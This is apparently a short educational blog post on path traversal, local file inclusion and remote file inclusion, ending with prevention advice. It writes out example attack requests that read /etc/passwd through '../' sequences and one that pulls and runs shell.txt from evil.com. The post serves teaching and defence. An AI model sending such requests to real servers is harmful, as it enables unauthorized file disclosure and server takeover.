Understanding Path Traversal, Local File Inclusion, and Remote File Inclusion

****************************************************************************

Vaibhavi Nayak

~3 min read · February 2, 2026 (Updated: February 2, 2026) · Free: Yes

Path Traversal

Path Traversal is a vulnerability that allows an attacker to access files and directories outside the intended directory of a web application.

This is done by manipulating the file path input to access sensitive files on the server.

Files could be — application code and data, credentials for backend systems, sensitive operating system files.

Ex.

../etc/passwd — file having user account information

Original Request || GET /viewfile?file=example.txt

Modified Request || GET /viewfile?file=../../etc/passwd

Impact:

Sensitive Information Disclosure

Preventing Path Traversal vulnerability:

Avoid relying on user input for constructing file path.
Ensure user input is sanitized and validated.
Canonicalization i.e. normalize paths to remove any .. or other special characters to avoid break out from intended directory structure.
Restrict file permissions so that users and web applications could have access to necessary files and directories only.
Continuously monitor and log access requests to detect abnormal file/directory access requests.

****************************************************************************

LFI i.e. Local File Inclusion

LFI is a vulnerability that happens when a web application allows user input (like URL parameters, form fields, or cookies) to decide which file to load from the file system of the local server, without proper validation or sanitization.

This lets an attacker include files that were never meant to be exposed.

Intended Request

http://example.com/index.php?page=home || Loads home.php

Malicious Request

http://example.com/index.php?page=../../../etc/passwd || Loads sensitive system file /etc/passwd

https://example.com/?file=abc.php changed to https://example.com/?file=../../conn.php

execution of conn.php showing db connections

Impact:

Sensitive Information Disclosure
Log Poisoning (injection of malicious code into log file) leading to Remote Code Execution

Analogy:

Breaking into a house and searching through its drawers (accessing local files of the victim).

****************************************************************************

RFI i.e. Remote File Inclusion

RFI is a vulnerability that happens when an application allows user input to specify a file to include, and it can load files from an external (remote) server controlled by the attacker.

This often leads to direct execution of malicious code.

In languages like PHP, if the configuration options allow_url_fopen and allow_url_include are enabled, functions like include() or require() can load files from remote URLs.

http://example.com/index.php?page=http://evil.com/shell.txt

Downloads shell.txt from the server of the attacker and executes it.

https://example.com/?file=abc.php changed to

http://example.com/?file=https://www.x.com/y.php

execution of y.php

Impact:

Remote Code Execution mostly causing full server compromise.

Analogy:

Forcing the house to download and run your own malware (loading remote files).

****************************************************************************

Difference between LFI and RFI:

File Source

LFI — Local Server. RFI — Remote Server

Goal

LFI — Information Disclosure. RFI — Execution of malicious code

Dependency

LFI — Does not depend on special server settings; works if the server code includes user input in file inclusion functions.

RFI — Depends on server settings that allow inclusion of remote URLs. If these settings are disabled, the vulnerability cannot be exploited to include remote files.

****************************************************************************

1 line difference

LFI implies inclusion and execution of local server files through user input.

RFI implies inclusion and execution of remote files (controlled by x) through user input and server configuration.

****************************************************************************

LFI Prevention:

Whitelist allowed files only.
Keep user uploads separate from executable directories.
Monitor LFI attempts via unusual requests, path traversal patterns.

RFI Prevention:

Same as LFI, plus block remote URL inclusion.
Keep user uploads separate; never execute remote content.
Monitor outbound connections for unusual fetches.

****************************************************************************

To summarise —

Path Traversal: Exploiting input to access and read local files on the server.
LFI: Exploiting input to include and execute local files on the server.
File Upload: Malicious files being uploaded to the server with an intent of taking control of the server. User uploads the file.
RFI: Forceful fetching and execution of files from remote server. User triggers the upload process.

****************************************************************************

#path-traversal #lfi #rfi

Understanding Path Traversal, Local File Inclusion, and Remote File Inclusion

****************************************************************************

Reporting a Problem